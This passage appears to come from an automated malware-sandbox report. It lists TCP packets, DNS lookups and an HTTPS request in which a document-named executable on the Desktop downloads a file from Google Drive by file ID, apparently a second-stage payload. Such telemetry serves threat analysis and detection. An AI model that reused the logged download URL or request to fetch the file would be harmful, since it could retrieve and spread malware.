                                                        Dec 16, 2024 17:58:40.427696943 CET49943443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:40.427777052 CET44349943142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:40.427825928 CET49943443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:40.542965889 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:40.543009996 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:40.543080091 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:40.543369055 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:40.543385029 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:42.253711939 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:42.253808975 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:42.254493952 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:42.254565001 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:42.256433010 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:42.256443977 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:42.256701946 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:42.256761074 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:42.257144928 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:42.299335957 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:43.160221100 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:43.160274982 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:43.160311937 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:43.160353899 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:43.160494089 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:43.160541058 CET44349950172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:43.160604954 CET49950443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:43.178009987 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:43.178055048 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:43.178139925 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:43.178373098 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:43.178388119 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:44.999474049 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:44.999766111 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.000308990 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.000317097 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.000360012 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.000365019 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.958342075 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.958444118 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.958863020 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.958945036 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.959319115 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.959394932 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.959907055 CET44349957142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:45.959989071 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:45.959989071 CET49957443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:46.089916945 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:46.089977980 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:46.090101004 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:46.090435982 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:46.090449095 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.792231083 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.792299986 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.793308020 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.793354034 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.803585052 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.803601027 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.803951979 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:47.804001093 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.807740927 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:47.851321936 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.707525015 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.707602978 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.707639933 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.707684040 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.708297968 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.708348989 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.708416939 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.708467007 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.709155083 CET49966443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:48.709171057 CET44349966172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:48.730804920 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:48.730854034 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:48.731074095 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:48.731230021 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:48.731249094 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.426261902 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.426356077 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.427961111 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.427968025 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.428219080 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:50.428275108 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.428534985 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:50.471369028 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372009039 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372082949 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372685909 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372754097 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.372766018 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372797012 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372921944 CET49972443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:51.372941971 CET44349972142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:51.521752119 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:51.521775007 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:51.521852016 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:51.522396088 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:51.522411108 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:53.218748093 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:53.218863964 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:53.219362974 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:53.219374895 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:53.219548941 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:53.219556093 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.133765936 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.133829117 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.133865118 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.133925915 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.134042978 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.134085894 CET44349979172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:54.134141922 CET49979443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:54.147730112 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:54.147770882 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:54.147936106 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:54.148082972 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:54.148097992 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:55.841567039 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:55.841691971 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:55.843278885 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:55.843290091 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:55.843489885 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:55.843496084 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.813364983 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.813505888 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.813529968 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.813622952 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.814280033 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.814434052 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.814434052 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.814477921 CET44349985142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:56.814579010 CET49985443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:56.933927059 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:56.933985949 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:56.934119940 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:56.934525013 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:56.934545040 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.635102987 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.635205984 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.638024092 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.638144970 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.640775919 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.640785933 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.641304970 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:58.641366959 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.641877890 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:58.683324099 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.546833992 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.546987057 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.547004938 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.547092915 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.547154903 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.547173023 CET44349995172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:58:59.547225952 CET49995443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:58:59.564034939 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:59.564093113 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:58:59.564193010 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:59.564794064 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:58:59.564835072 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.265871048 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.266047955 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.267636061 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.267646074 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.268718004 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:01.268807888 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.269105911 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:01.311328888 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213032961 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213232994 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.213246107 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213289976 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.213538885 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.213607073 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.213989019 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.214035034 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.214186907 CET44350001142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:02.214246988 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.214265108 CET50001443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:02.339910030 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:02.339940071 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:02.341149092 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:02.341475010 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:02.341490030 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.046215057 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.046329021 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.203032017 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.203047037 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.203192949 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.203198910 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.967564106 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.967776060 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.967814922 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.967868090 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.967917919 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.968046904 CET44350008172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:04.968116999 CET50008443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:04.977511883 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:04.977581978 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:04.977684021 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:04.977912903 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:04.977946043 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.681802034 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.681947947 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.683712959 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.683743954 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.684160948 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:06.684223890 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.689632893 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:06.731328011 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.630565882 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.630678892 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.630734921 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.630800009 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631546021 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.631616116 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631623983 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.631680965 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631746054 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631782055 CET44350014142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:07.631808043 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.631841898 CET50014443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:07.761969090 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:07.762036085 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:07.762135029 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:07.762445927 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:07.762478113 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.468173027 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.468261957 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.468903065 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.468967915 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.470432043 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.470455885 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.470704079 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:09.470763922 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.471055031 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:09.515346050 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.377461910 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.377615929 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.377686024 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.377763987 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.377979994 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.378032923 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.378077984 CET44350022172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:10.378102064 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.378138065 CET50022443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:10.392374039 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:10.392438889 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:10.392525911 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:10.392812967 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:10.392846107 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:12.087651014 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:12.087757111 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:12.088391066 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:12.088401079 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:12.088562012 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:12.088567972 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.025890112 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.026055098 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026134968 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.026211023 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026578903 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.026643038 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026818037 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.026937962 CET44350028142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:13.027004004 CET50028443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:13.152251005 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:13.152302027 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:13.152405024 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:13.152779102 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:13.152798891 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:14.849339008 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:14.849536896 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:14.850007057 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:14.850014925 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:14.850219011 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:14.850224972 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:15.759206057 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:15.759409904 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:15.763075113 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:15.763139009 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:15.763207912 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:15.763257027 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:15.824949026 CET50029443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:59:15.824975967 CET44350029172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:59:15.855529070 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:15.855588913 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:15.855668068 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:15.856492996 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:15.856513023 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:17.553595066 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:17.553755045 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:17.555847883 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:17.555856943 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:17.556091070 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:17.556154966 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:17.556505919 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:17.599374056 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:18.507194996 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:18.507253885 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:18.507272959 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:18.507337093 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:18.508169889 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:18.508244991 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:18.508254051 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:18.508266926 CET44350030142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:59:18.508327007 CET50030443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:59:18.508327007 CET50030443192.168.2.6142.250.181.1

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2024 17:57:33.471755981 CET6393453192.168.2.61.1.1.1
                                                        Dec 16, 2024 17:57:33.609023094 CET53639341.1.1.1192.168.2.6
                                                        Dec 16, 2024 17:57:36.268054008 CET5036353192.168.2.61.1.1.1
                                                        Dec 16, 2024 17:57:36.406618118 CET53503631.1.1.1192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 16, 2024 17:57:33.471755981 CET192.168.2.61.1.1.10xe912Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Dec 16, 2024 17:57:36.268054008 CET192.168.2.61.1.1.10xf268Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 16, 2024 17:57:06.968844891 CET1.1.1.1192.168.2.60xaacaNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 16, 2024 17:57:06.968844891 CET1.1.1.1192.168.2.60xaacaNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                        Dec 16, 2024 17:57:33.609023094 CET1.1.1.1192.168.2.60xe912No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                        Dec 16, 2024 17:57:36.406618118 CET1.1.1.1192.168.2.60xf268No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649776172.217.19.1744434420C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:57:35 UTC216OUTGET /uc?export=download&id=15C7889YQ1NN9p5ty5miFE834NBt4YyP- HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2024-12-16 16:57:36 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:57:35 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=15C7889YQ1NN9p5ty5miFE834NBt4YyP-&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-hCLsu_y5ql8EKfY3RX3q8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
